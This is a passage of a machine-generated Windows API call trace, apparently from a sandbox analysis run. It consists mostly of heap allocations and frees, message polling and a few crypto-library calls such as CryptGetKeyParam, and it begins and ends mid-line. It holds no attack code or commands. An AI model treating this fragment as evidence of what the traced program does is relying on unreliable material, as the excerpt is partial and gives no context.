(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0041.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cef8 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0041.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbaf4) returned 0x935008 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0041.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0041.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.433] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3e8 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.433] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.434] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0041.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.435] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0041.436] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.436] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.440] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.440] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.440] PeekMessageW (in: 